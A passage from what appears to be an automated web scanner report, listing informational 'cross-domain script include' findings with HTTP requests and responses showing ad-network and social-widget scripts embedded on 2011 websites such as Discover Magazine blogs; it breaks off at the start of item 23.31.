Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:27:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1528833724?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

23.24. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; session=1296350849|1296350849; dlx_XXX=set; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2661
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/804341
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/804341397/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=804341397?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

23.25. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:41:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=72207368?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

23.26. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

23.27. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bassistance.de
Path:   /jquery-plugins/jquery-plugin-validation/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /jquery-plugins/jquery-plugin-validation/ HTTP/1.1
Host: bassistance.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Cookie,Accept-Encoding
X-Pingback: http://bassistance.de/xmlrpc.php
WP-Super-Cache: Served legacy cache file
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 672388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</h2>


<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/bassistance.json?callback=twitterCallback&amp;count=3&amp;named_obj"></script>
...[SNIP]...

23.28. http://blogs.discovermagazine.com/badastronomy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.discovermagazine.com
Path:   /badastronomy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /badastronomy/ HTTP/1.1
Host: blogs.discovermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:04 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 30 Jan 2011 01:39:04 GMT
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.discovermagazine.com/badastronomy/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://blogs.discovermagazine.com/badastronomy/wp-content/themes/discover/css/Quills.css" />
<script type="text/javascript" src="http://www.fark.com/js/farkit.js"></script>
...[SNIP]...
<meta name="generator" content="WordPress 3.0.3" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
</p>

<script type="text/javascript" src="http://twittercounter.com/embed/BadAstronomer/f0a804/000000"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.29. http://blogs.discovermagazine.com/cosmicvariance/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.discovermagazine.com
Path:   /cosmicvariance/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cosmicvariance/ HTTP/1.1
Host: blogs.discovermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:04 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 30 Jan 2011 01:34:52 GMT
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.discovermagazine.com/cosmicvariance/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 118893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://blogs.discovermagazine.com/cosmicvariance/wp-content/themes/discover/css/Quills.css" />
<script type="text/javascript" src="http://www.fark.com/js/farkit.js"></script>
...[SNIP]...
<meta name="generator" content="WordPress 3.0.3" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s16.sitemeter.com/js/counter.js?site=s16cosmic">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.30. http://blogs.discovermagazine.com/loom/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.discovermagazine.com
Path:   /loom/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /loom/ HTTP/1.1
Host: blogs.discovermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 30 Jan 2011 01:53:08 GMT
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.discovermagazine.com/loom/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 151314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://blogs.discovermagazine.com/loom/wp-content/themes/discover/css/Quills.css" />
<script type="text/javascript" src="http://www.fark.com/js/farkit.js"></script>
...[SNIP]...
<meta name="generator" content="WordPress 3.0.3" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&amp;type=wordpress&amp;buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/carlzimmer.json?callback=twitterCallback2&amp;count=5"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.31. http://blogs.msdn.com/b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx

Issue detail

